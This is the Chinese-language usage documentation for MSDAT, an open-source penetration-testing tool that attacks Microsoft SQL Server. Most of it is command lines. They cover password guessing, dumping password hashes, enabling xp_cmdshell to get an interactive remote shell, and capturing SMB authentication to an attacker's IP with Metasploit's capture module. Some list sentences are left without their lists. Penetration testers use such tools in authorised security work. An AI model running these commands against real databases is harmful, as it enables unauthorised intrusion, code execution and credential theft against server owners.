| Quentin HARDY |
|---|
| [email protected] |
| [email protected] |
MSDAT(Microsoft SQL Database Attacking Tool)是一款开源渗透测试工具,用于远程测试 Microsoft SQL 数据库的安全性。
MSDAT 的使用场景示例:
已在 Microsoft SQL 数据库 2005、2008、2012、2014、2016 和 2019 上测试。
借助 MSDAT(Microsoft SQL Database Attacking Tool),你可以(非详尽列表):
需要安装一些依赖项才能运行 MSDAT。
在 Ubuntu 中:
sudo apt-get install freetds-dev
或从 http://www.freetds.org/ 下载 freetds
安装 Python 依赖项:
sudo pip3 install -r requirements.txt
sudo activate-global-python-argcomplete
或
sudo pip3 install cython colorlog termcolor pymssql argparse python-libnmap
sudo pip3 install argcomplete && sudo activate-global-python-argcomplete
在你的 freetds 配置文件中添加 "use ntlmv2 = yes"(例如 /etc/freetds/freetds.conf 或 /usr/local/etc/freetds.conf)。
示例:
[global]
# TDS protocol version
tds version = 8.0
use ntlmv2 = yes
python3 msdat.py -h 2 ⨯
usage: msdat.py [-h] [--version]
{all,mssqlinfo,passwordguesser,passwordstealer,xpcmdshell,jobs,smbauthcapture,oleautomation,bulkopen,xpdirectory,trustworthype,userlikepwd,search,cleaner}
...
_ _ __ __ _ ___
| \_/ |/ _|| \ / \|_ _|
| \_/ |\_ \| o ) o || |
|_| |_||__/|__/|_n_||_|
------------------------------------------------------
_ _ __ __ _ ___
| \_/ |/ _| | \ / \ |_ _|
| \_/ |\_ \ | o ) o | | |
|_| |_||__/icrosoft |__/atabase |_n_|ttacking |_|ool
-------------------------------------------------------
By Quentin Hardy ([email protected])
positional arguments:
{all,mssqlinfo,passwordguesser,passwordstealer,xpcmdshell,jobs,smbauthcapture,oleautomation,bulkopen,xpdirectory,trustworthype,userlikepwd,search,cleaner}
Choose a main command
all to run all modules in order to know what it is possible to do
mssqlinfo to get information without authentication
passwordguesser to know valid credentials
passwordstealer to get hashed passowrds
xpcmdshell to get a shell
jobs to execute system commands
smbauthcapture to capture a SMB authentication
oleautomation to read/write file and execute system commands
bulkopen to read a file and scan ports
xpdirectory to list files/drives and to create directories
trustworthype to become sysadmin with the trustwothy database method
userlikepwd to try each MSSQL username stored in the DB like the corresponding pwd
search to search in column names
cleaner clean local traces
optional arguments:
-h, --help show this help message and exit
--version show program's version number and exit
./msdat.py -h
./msdat.py all -h
你可以通过 --test-module 选项了解特定模块是否可用于 MSSQL 服务器。此选项已在每个 mdat 模块中实现。
all 模块允许你运行所有模块(取决于你提供的选项)。
python msdat.py all -s $SERVER
如果你想:
./msdat.py all -s $SERVER -p $PORT --accounts-file accounts.txt --login-timeout 10 --force-retry
在每个模块中,你可以使用 --charset 选项定义字符集。
在未认证的情况下获取远程 MSSQL 服务器的技术信息:
./msdat.py mssqlinfo -s $SERVER -p $PORT --get-max-info
此模块使用 TDS 协议和 SQL 浏览器服务器来获取信息。
此模块允许你搜索有效凭据:
./msdat.py passwordguesser -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --force-retry --search
--force-retry 选项允许为每个用户测试多个密码而无需确认
你可以使用 --accounts-file 选项指定自己的帐户文件:
./msdat.py passwordguesser -s $SERVER -p $PORT --search --accounts-file accounts.txt --force-retry
转储哈希密码:
./msdat.py passwordstealer -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --dump --save-to-file test.txt
此模块已在 SQL Server 2000、2005、2008 和 2014 上测试。
通过 xp_cmdshell(https://msdn.microsoft.com/en-us/library/ms190693.aspx)执行系统命令:
./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --shell
上述命令将为你提供远程数据库服务器上的交互式 shell。
如果 xp_cmdshell 未启用,此模块中的 --enable-xpcmdshell 可用于激活它:
./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --enable-xpcmdshell --disable-xpcmdshell --disable-xpcmdshell --shell
--enable-xpcmdshell 选项启用 xp_cmdshell(如果未启用,默认情况下未启用)。
--disable-xpcmdshell 选项禁用 xp_cmdshell(如果已启用)。
通过此模块,你可以捕获 SMB 认证:
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --capture $MY_IP_ADDRESS --share-name SHARE
要捕获 SMB 认证,可以使用 metasploit 的 auxiliary/server/capture/smb(http://www.rapid7.com/db/modules/auxiliary/server/capture/smb)模块:
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > exploit
此模块的 capture 命令尝试通过 xp_dirtree、xp_fileexist 或 xp-getfiledetails 过程捕获 SMB 认证。